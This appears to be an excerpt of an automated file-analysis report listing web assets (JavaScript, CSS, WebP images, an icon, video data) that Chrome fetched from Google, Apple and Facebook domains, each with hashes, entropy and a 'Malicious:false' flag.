                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (579)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):17977
                                                                                                                                                                                                                                  Entropy (8bit):5.172440917667389
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:xV1W44hioeBevmrjGRp1AFjga2dCjrI7KV0t:s44hioeBA7AFjgaU7KV0
                                                                                                                                                                                                                                  MD5:E62FEA2030907AF7E89AE14B53FFA550
                                                                                                                                                                                                                                  SHA1:7B4F41FC31DA2F829A183DFF72CDD708EA76665D
                                                                                                                                                                                                                                  SHA-256:F66B859A3A06C27EF58D1CC069E5BA8A9A47B3C7AEAF448EADF1F589582C360B
                                                                                                                                                                                                                                  SHA-512:1CDD5DCFCA7F6EFB33854F4ED6BA0D535CC0D444A78499240DAFBBCA2ABE9772E14A5D0E7A34CDE9A9716E068CE5FD6F5EB3271BC549BF17DE075F18E31661CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.359.1a547c0d896fa5233fdb.js
                                                                                                                                                                                                                                  Preview:/*! For license information please see chunk.359.1a547c0d896fa5233fdb.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[359],{65359:function(t,e,n){t=n.nmd(t),function(e){"use strict".var n=function(){return(n=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]).return t}).apply(this,arguments)}.function r(t){var e="function"==typeof Symbol&&Symbol.iterator,n=e&&t[e],r=0.if(n)return n.call(t).if(t&&"number"==typeof t.length)return{next:function(){return t&&r>=t.length&&(t=void 0),{value:t&&t[r++],done:!t}}}.throw new TypeError(e?"Object is not iterable.":"Symbol.iterator is not defined.")}function o(t){switch(Object.prototype.toString.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0.default:return s(t,Error)}}function i(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function a(t)
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4286
                                                                                                                                                                                                                                  Entropy (8bit):4.639719888612948
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:EdAdhzUooooRoooT0oooooHooooooovqxoooooooooA:EkLL
                                                                                                                                                                                                                                  MD5:A217F758EFDFFF14053678DBE58FA4D0
                                                                                                                                                                                                                                  SHA1:6E0EB512C2F386D645712D7ECBE339EA85CFCA68
                                                                                                                                                                                                                                  SHA-256:F343B3015D0545A7D5B719A434135BCAE2AC766ED459AEEA671E3688B79D1875
                                                                                                                                                                                                                                  SHA-512:9BCF90FED875FFAF3170EF3425949642EB23B4E750CD42BA546D30E1A58C4FEE1A14CCDBD31455A6A442D09372CCB3873BD7477A59853608BC87660FB578119F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:...... .... .........(... ...@..... .................................................................................................................................................................5C..5C..5C.]5C.5C.5C.`5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l.................................................. <../A.8D..5C..5C..5C..5C..5C.:5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l..................................................TN.(?..'>..8D..5C..5C..5C..5C..5C.5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l....................................................2..l...8..&>..8D..5C..5C..5C..5C..5C..5C.5C..5C..5C..5C..5C..5C..5C..=/..$l..................................................../... ..m...8..&>..8D..5C..5C..5C..5C..5C..5C..5C.g5C..5C..5C..5C..5C..=/..$l...................................................E...>......m...8..%>..8D..5C..5C..5C..5C..5C..5C..5C..5C.?5C..5C..5C..=/..$l...................................................B..C...>......m...8..$=..8D..5C
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 526x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):49158
                                                                                                                                                                                                                                  Entropy (8bit):7.995577451303464
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:1536:rurRMeEqU3SEO048UU9CQYQFeFtINz1WfeN:6rwqU88U4YpyNBMeN
                                                                                                                                                                                                                                  MD5:F5F5E7B806A0E148792442D9C95E4DF0
                                                                                                                                                                                                                                  SHA1:DE1875F07230F68F1E35E91DCEDA4E65B36CC1F2
                                                                                                                                                                                                                                  SHA-256:3DD837A85283372ECE9AE3450BEAA60E2A5C6AE3512BAD4DC4FA0A0525F82469
                                                                                                                                                                                                                                  SHA-512:E6E9ED78B3A4DA00D774586A5DDC574571E0AD5BF4BDDF4D622CEFD2AD3835CF004BAB613179247D58D06632A943F0E579D2747AE2508F2D3098B8FE9CFAFFE4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ........*..(.>u,.F....39.....h...yX.Y|.....p? >W.'.?.~.....^..../............_...y...{....t...s.....k...O..P..?.?.._....................~..;.w...................s......4|.{........{r.?..........?..?...?.?..VzS......B??...../...?...N......_..l...[...W......O.w....,.....s..././....t.s............+.........../..................w....?........U]i..[.......M....:.......H...x.@.|<.....`.bn.<dlGI,..<..>.yY..&2R...O..[..z.]fn..=...*...g1...7H...;..i.."1....._.....j.8...A..c..7...~w.t0..e.~.?3.JG2n..Z..>...|.=.~...s]nC..[.Q(.....R...w=qW5.j..n.......7..`..)}N.B..7.YZ.........#..o....^...G.y.H...[..........V .O.f..i)e4=Ca.B.E.z..=..~j...............]|6.t..\.".'.Ca....H..us.-.9]....B.......S....a..Ht.~.....#..?_2..~$y.xo.l.......I...@$.a.4>..&..{0.1...U1...W..nx.)i.'2..C5o.\I%.~...t.7....3.n.R.1 db..KNr...>.s@..e.9.f.K.....]...E......G@*e...S0..g......7k.hPl...-.#yZ.R.2v...`..5.F.......oe.Ys .E............._e......%..(...gf"..T?G.D0.~
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):35166
                                                                                                                                                                                                                                  Entropy (8bit):7.993906515460747
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Lo7bx0ENM+qArqRFsjA6soKxUs5n6nYqfx0mz:M7bmENM0rqRunsXUs56nYsn
                                                                                                                                                                                                                                  MD5:DB14CF957F653B59549F1F97B9D9B244
                                                                                                                                                                                                                                  SHA1:BB5758B726DE6E35271B602BE05EBF24371B3FF2
                                                                                                                                                                                                                                  SHA-256:65DF5609FE2302C70875786C6F04383FB3C0FFF09FFDB69AFD884A41733B31C6
                                                                                                                                                                                                                                  SHA-512:52A76D25551D1DD36361629E21023265844BD612C487F09C4A9D8CEE9E087C87F970FF93E7E05946D3A821D4F402A843E080FA9E48DEF6066E8C77ECBF234948
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/fkZeS0WFB9F7eek_vtduoMGNd8Ok5LnjRAGCvmrdxk7U4_6SuAyxMo86c71zL7WzoC0=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFFV...WEBPVP8 J...pl...*..(.>q,.F$...1..@...lk.W.>/C.........x.A.....).7.?...?.w......./...=.......w._........~........].s....Q.._......s=........w......3.O.o.....O...~.?...?..X....g...........O..i...3.w..y.y..w.........s.....|c.S...G.?.?..m{.....|....._.O`.k~..;.g.._....E.o...?....@......../.^......w.....?.....g>........w.O...?......u.............?.................z.....$.k....|.X_}VQ..yzw..nz........1.....F..Q.....i.y.H...(......U2.@9.8f..-./..08.......IT.....e.....I..L.H.-..._......i.y.{..+w\..V..M.b..I.M....Z.......l.x-...R.8..s2.....L..x....2A.N...........J[j.".YpB^..'....-A....w./<.r..R.[..,...5....`j..8..O".M.1Jn..,*&=....#.W>9....w..s..3.W..`33.#..).e..cX.t.w8...FGW......?.S.C.L..W....W.'..L.!.N.<e.!..J.f.l6$E..JW}.z.E*...-.t......k0......e&....B..X.......... Ssi..U.a...c.....5/..../..<M..:.?..W...I...b...H..l.N...(.^.J.-..................K.3......t.......B.;..gD..X...V..T...YOu.[.....~..7...mv....eS....v.C@Z.ql...a..4.....`o...f.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1927)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11218
                                                                                                                                                                                                                                  Entropy (8bit):5.35617324679183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:bZWIlwG1Iv5QxUOcQRtPnIa0qVNAb2x5iUidJeJLFiNxFxSfILsBb5dl2V3iSkF:b0IT1IBOcQzvIapNAqfh+H2ILsBNPcRC
                                                                                                                                                                                                                                  MD5:E8B8ED410D52E42957CD5EFBB2DA24BB
                                                                                                                                                                                                                                  SHA1:84B2A4C493C53885B1BCC5B4C4B9DAED491EBC8C
                                                                                                                                                                                                                                  SHA-256:F298D601608D58AFC41EF27D61D9D250028C976FC185A746DAD0A6544E880A5C
                                                                                                                                                                                                                                  SHA-512:6F1E24B1B82F7F1BF32F53D20DAA9C7137C9DE73F1761369056B6F04065BE2AC0FEAB0CA5FEE960589AC9098AEEB82960BD866C8BF7CE83662C40EC8C3FE1CA8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("TrustedTypesGoogleAnalyticsScriptURLPolicy",["TrustedTypes","err"],(function(a,b,c,d,e,f,g){"use strict";a={createScriptURL:function(a){if(a==="https://www.google-analytics.com/analytics.js"||a.includes("https://www.googletagmanager.com/gtag/js"))return a;throw c("err")("Violating Trusted Type policies. Provided URI (%s) is not equal to https://www.google-analytics.com/analytics.js or https://www.googletagmanager.com/gtag/js",a)}};b=c("TrustedTypes").createPolicy("google-analytics-url",a);d=b;g["default"]=d}),98);.__d("GoogleAnalytics4Setup",["DeferredCookie","ODS","TrustedTypesGoogleAnalyticsScriptURLPolicy","WebStorage"],(function(a,b,c,d,e,f,g){"use strict";var h,i;function j(){var a=(i||(i=c("WebStorage"))).getLocalStorageForRead();if(a==null){(h||(h=d("ODS"))).bumpEntityKey(6413,"cookies","google_analytics4.localStorage.read.fail");return null}return a.getItem("ga4_client_id")}function k(a){var b=(i||(i=c("WebStorage"))).getLocalStorage();if(b==null){(h||(h
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4000
                                                                                                                                                                                                                                  Entropy (8bit):7.931265896262218
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:SMHmIlIS5csGeXxMdTo9mnsoDJbmDLYbX:SSmIlB59GeXaGkZBmDMbX
                                                                                                                                                                                                                                  MD5:5B494C32A2CE1E16BE3CDDF444DDEAD3
                                                                                                                                                                                                                                  SHA1:F45613851DD0605F3AE2155A668EE0C2BA7AF39D
                                                                                                                                                                                                                                  SHA-256:B068E090E697BD9690143866D3272EEA4A18B76BE7E9307AAABED15B498D10ED
                                                                                                                                                                                                                                  SHA-512:BD5A399F3B379A94CA96FA95C61BC4610D6D61EE02AB4C5AA2CB27FB1D8A5C7FB699F781E9C5CD6AAEC1E32047F1DD37C5221D7EAB84AACB814B1BEF6153200D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X..............VP8 ....pJ...*....>.N.H.....2J.....nw..&...k.WX'......n.p._.?...........1.O.+.?.g....V.F....~.|..^...................Y{.X`..y.;....8[wO_..;.cmO:.C..f.8.....l..~./0.......(.../4...\.95......W{M....t<.O.0.5..DPi.;.....n/..6..h.o./..x.g..5..&..U..EU.z..?`.E...p.&wG."}.}..;O:.^d..j...r.n......5..L...:..*gt.Rtnig.=.w..Q......X...s...;.O3....E..k;W3.A..)...tGp......'..n....2..2y:..4....>M.....n.......Gf.m..!HHy..ra;#x<&*Nj...^.&..B../<.sA..\.&|.......$.. ...+...P....N..S...S+[..v...`{..s.....g1.tb...{..Z...b"Q....aT..`|[gFd..@....2.t..,lE.C~...^.~7.4.)AN.....cX.4P}....1V(?..'.ijTn`....#../.C.T[..B..O7\..{FK...p.:...........D./g..m.......b&p.g?...>I1...musO.NA..H..T..u.../...3......!>-..Cz.~...S...+..>..T.@.u..S.>`.5....O....".Aq..q.4...E..,....~..+.u..%.....d.....@...@0xI1...4.C.6~. 4..Uw%;\.,........t..g.....D0.l.G.L......~...0&..*.S.....pl..........Z..+.l.O....<d>#S.4..i..2...Q..\../.j...5i..<.T..ev..'......~.......
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3089)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):69640
                                                                                                                                                                                                                                  Entropy (8bit):5.428026405432715
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8Rx5xxd9L0ngo2qQmDVeClRhw7d5i8q7nXxaFuYPdZIJVNfOT/BhqxlWZ:8j1dF6goxVe8vwiUFrdC2T/TwkZ
                                                                                                                                                                                                                                  MD5:F713EEB3B0A890A92D79B1B20AB97B0B
                                                                                                                                                                                                                                  SHA1:0262AD1062E4FC48562B58619FF2259F337D118F
                                                                                                                                                                                                                                  SHA-256:34747B2688FD1736007211CCCA2276A7C23F05228D1C4B5C2D4D239DDDBDFD14
                                                                                                                                                                                                                                  SHA-512:2B99EA22E50A6AF7988C5670411795A093A8CA25352BD881CC44FF141985C521FDFEA104F64F57B9A5C5572404516780D31CFC0D411B61DB1566020AA924068F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/feedback/js/ghelp/16uafg9rapvyz/chat_load.js
                                                                                                                                                                                                                                  Preview:(function(){'use strict';var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var p=ca(this);function t(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(h){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(h||"")+"_"+e++,h)}function c(h,f){this.g=h;ba(this,"description",{configurable:!0,writable:!0,value:f
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9540
                                                                                                                                                                                                                                  Entropy (8bit):7.971812185114183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5mNgmnHvyM5E3U5/73FRuMdaXs0m1acoS+g8e7UnmXFeXbgd2WeTMdHK34Dg:5yguHsE5T/daXs0m8m7cm0Xb7TwM
                                                                                                                                                                                                                                  MD5:283602777EEBD73ECB356545D207EDAC
                                                                                                                                                                                                                                  SHA1:222B14B3CDD540F60697CE68A206C26E6ED98B64
                                                                                                                                                                                                                                  SHA-256:26F13669B7AE2D64C6199FD69A43C922C6B86230D8B6EA248EAE7C85BB6A6E33
                                                                                                                                                                                                                                  SHA-512:A8C45E42337E9AA54B97B4FE84AFB21BB295B887823E1577F54DEB7B938ADC98E6876A44EF0A89404D666C76E5DB68499AD4897727E58022A674A5905CC4B970
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF<%..WEBPVP8X..............VP8 .$..p....*....>.J.I..6....*......p/.L..q=......................'~e...E............k}..........{.o.'..c?._.....~..w{,.w....._......./J.g......?.|.....q.....>......B=..............B.........>.>......O.....].=.........A%ZT.Y%ZT.Y%ZT.Y$...R.j.$...g...(..x..Z..u6.@.!.N...I.wS...#.....V....s....t-...My....V...]...s../s.....2.Y..A".V......O......Rmd],......t_<g..7o.>..U"S.....f1.L..l.5.e..H(..g.....9.....A.3.ve.@v.<.;..,D...i?.|.0..b..hzz....L3.;k. .I.].....D...kQ.....z'.A;....Q..x...)F;.......&.r.s...B.Dc.A6...9~..R...z.._O`...Hu....T-.q....Q.ST...i.....Y:.:.h.2o..z.kLn"Yn..U...RE".[V..H.P..".o.|..pC..B..I,.ig..r....Z${....2..N."....j.....2.......*..YXR.H3.)....U.\...M..=C..g.^.........t./t......&..kmV..U...X2.#..|.Z.$<...9Y.1Y.....*/....V..._...^.k....6.K0...3|-....!u...Q..|..k....`..>|b6....|9".t...)py}JF.)....HGb..6..Y...5.....z..J.'....Z\.Oi...U.Y..J..Y.......a...\=.t.1$y.....^.H.4.Gt......u.....;(C~...i.M
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):3814
                                                                                                                                                                                                                                  Entropy (8bit):7.871541682436775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:cZ3KVPcErbmf3XCy1CSuLZIezijXSWX7ZDjmzkrk1JrA92iK:cdK5cb3nM7LZRzcXXrZGzkrk1JrAE3
                                                                                                                                                                                                                                  MD5:1B93291952A9279098E75F2D255BD09A
                                                                                                                                                                                                                                  SHA1:03CA4D77C2ADD95DF56D2442D58B5DB87BEA46C8
                                                                                                                                                                                                                                  SHA-256:BC293C8D38B59A0BFE788F7F4197A9FEFF9546F279077CE8049D77EBE5031D4D
                                                                                                                                                                                                                                  SHA-512:933DF67F6834E1101E7904E9C69577B9A556EFE9220A001A251ECE951AC786EF885E7A6D60C7DEA63E5F1E7D6A72F8CEE15D61AE97E13ED3B99A94A912EE456B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?....3m.(]..?.i.".?...@u...i..D..-.x.."IR..{Of..6I..H......W.....R.....X.`..rx.....|.\.HM......V...p.....{.......a...w0D...."}.4.[.v+I.$.E.b.{KAE.8. .M......tG.....Hr$.Q3w..}.UJ.$.$.9...I.....m.HJ...:...7....m...t.w..m..1^.mc..O{....m.l....T......H.].J....i..._.w..4...x.m.mk.JmcLl..m.m[1..l...}..`G........$.6K...t.4{.iv..G.c..x.]....y.4...G\..9.8....p.p.x<ERI.A.$I.....b....s6...&.b.1$.f..4.N.Wz*.4p .c...bBAX..........e.&..e.^hds"'.F...%...0.... c5.lFE.BL...#.~@.s.,.."..pD#.!.l``#.$.`....C..b..<...#f.6:.,...J.4z..+..4k.f.../l'}r....k.YBl....\..b..nmF..../.9t....r....q.Y.t.d7...0.O..hP9..,h....7|.O...n.[E..|.Q....G.k..ql.....e.1.!#"D#6.8..8.M.M..9.....+'....C....m.1...0.}.....>.t.......A..M.b...?x..!......sv~.oO.s..\...+..b.`.i.Z...9..Hr0.*....r. y..u8.?.E.......5...@*..._..U.U....=|-....MP.a5[.j..S.:.x..@-..~H, 0...F.....b:..P..p..7..Wfe.|.>...%.e........|........2p..?.I.....@......O..3W....iy9|.!....pd.;'O.F@..V@.n
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4413)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):70119
                                                                                                                                                                                                                                  Entropy (8bit):5.482416944401544
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yRCgsRrWCaqcPCCB/HwWrWyt7wlwLBxDfiVjlhslrtiIG1XUAmPGiwNj9:yRCgqWCaq/CBP1xDfiVjVeS9
                                                                                                                                                                                                                                  MD5:90EBCEDEA8A84F7D95E2447FC91A0D54
                                                                                                                                                                                                                                  SHA1:BEF5971C8BD0ED27310B88E3564997B59CF8C7A7
                                                                                                                                                                                                                                  SHA-256:381B76E1A851B6355A701EE40DE603339C3F9B035A05EF22C671B89724214638
                                                                                                                                                                                                                                  SHA-512:89BB9242D90619E43D7F8082C286894462120ADD718CF2EF7B98E440ED6DBC5F56FF4DD5058DF7AA793DE4749C6EE58E52A143A0EF94FE5E7B1F7A4DD3146078
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractTextField.react",["cx","DangerouslyAccessReactElementInternals_DO_NOT_USE_IN_NEW_CODE","Keys","joinClasses","react"],(function(a,b,c,d,e,f,g){var h,i=h||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(){var c,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(c=d=a.call.apply(a,[this].concat(f))||this,d.state={focused:!1,value:d.props.defaultValue||""},d.onInputKeyDown=function(a){var c=d.props,e=a.keyCode,f=a.shiftKey;e===b("Keys").BACKSPACE&&!f&&c.onBackspace?c.onBackspace(a):e===b("Keys").TAB&&!f&&c.onTab?c.onTab(a):e===b("Keys").TAB&&f&&c.onBackTab?c.onBackTab(a):e===b("Keys").UP?f?c.onShiftUpArrow&&c.onShiftUpArrow(a):c.onUpArrow&&c.onUpArrow(a):e===b("Keys").DOWN&&c.onDownArrow?f?c.onShiftDownArrow&&c.onShiftDownArrow(a):c.onDownArrow&&c.onDownArrow(a):e===b("Keys").LEFT&&c.onLeftArrow?c.onLeftArrow(a):e===b("Keys").RIGHT&&c.onRightArrow?c.onRightArrow(a):e===b("Keys").RETURN?(c.onEnter
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):860806
                                                                                                                                                                                                                                  Entropy (8bit):7.997275689034368
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:24576:4ixC6iZTtHFFijEF+DpxVParhNZy+/4f+yGR09S:DxTi9tHFUjEF6arv4U4f2
                                                                                                                                                                                                                                  MD5:744D4EF86CB19EDA05EF6070BAFDCFCF
                                                                                                                                                                                                                                  SHA1:9BB8F7AA7C87B01E6594C936D183B2B3B2317318
                                                                                                                                                                                                                                  SHA-256:1F6B19BDC237CE3DF87957F6BE2FA5CEC6B1E1C9C985CC873F8827C8A8DDD9B2
                                                                                                                                                                                                                                  SHA-512:D13F7F4664413DB5D17CC42759D41EA399C85EF30BBCDC9F643EE7ABC36EE11BC3C965DBBE21BBC5986EEDFD1A6735F5FF64BA2D430B13995452CF985744FC87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/8f/cb/4e/8fcb4e35-30df-c295-bbd9-4760d511ef3e/P875466468_Anull_video_gr265_sdr_886x1920-.mp4:2f81d129bf3797:5
                                                                                                                                                                                                                                  Preview:I.kq.a.......,J.L...{y.O..LIR..u....5y.G{@..8.;...\.ryb.o]...`...c)..J89......Q.....W.u.._Lp&....3..V.....p....AD................K...J.2Bb#!.....&..2...R. ..r9;....M.k#..0.)...Haw.a.&.QN9....a....o.)...}...rL.sF.Q..S.$...2....I.$5n.p.k..[.i.g....j^2...nJGT.]_...LQX.*.m..kO..I%1.Pe1o~..p..V..s.....4....e.[..]......9|....#../.l.......,./$f../.h......d.../..*.ls.6Cd..U.(..M..5uT.%.4M......7\.=Yq.......^6....c.G...@...>AlrV#)..O..\.3fB._2......(J.w...r.(.)%j...+Kn&.../br......u.=..k..`q..E..j.>.vD.>...J{.f..4,.1.`Mj...N.w....z7!.z.;.....2+RF...Y.'.~.o[.xP.}u..........NU.....&M...2h.{K..+...b.kOi....Y|..K.@.9....}}.J.FD.r..r..9....p.... R.....wS...6.q.....C.cF.2.B....,.*a.<x...).+p.........c.v..(..`<^...t..3..}.d.!:.1...L..h..p..Dj6`.......o.w.l......kVq........X...../.....P}.h..0.._........f..^...?....r.f.MJ.r|.b.>U.jo&Q....c.\L...R.kf3..........S..6.|.,.:[.....00.......].s..T....nh.R....l.wwt,..pX4...{...1.6F....A..2O...D...r~.`#.pE;..=.....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7814
                                                                                                                                                                                                                                  Entropy (8bit):7.9654887532181435
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:hPLgMmqV85Y02OL/y+9l+yjUWYP4fdBCMSSH7h:tLgLqd0pLy+r+OFYPwdBCMSsh
                                                                                                                                                                                                                                  MD5:62F1BE90798092ED70E1F9527CE978BF
                                                                                                                                                                                                                                  SHA1:1FD2110FCDCA35DF3DD59BD51FB92B8EFA2C89D8
                                                                                                                                                                                                                                  SHA-256:181BBF8B0BFA809F83405A0D06FF06178FFCB7D5D63F51AB913117EAF5225562
                                                                                                                                                                                                                                  SHA-512:8270545DECBBE65C0F08EDE24243BD4E1C84729551C51F05BB3DF20591B789A8EF815B3FC56C0BC588762A770BD777DFD1F2B547AE3B837B19E4936B811860EA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
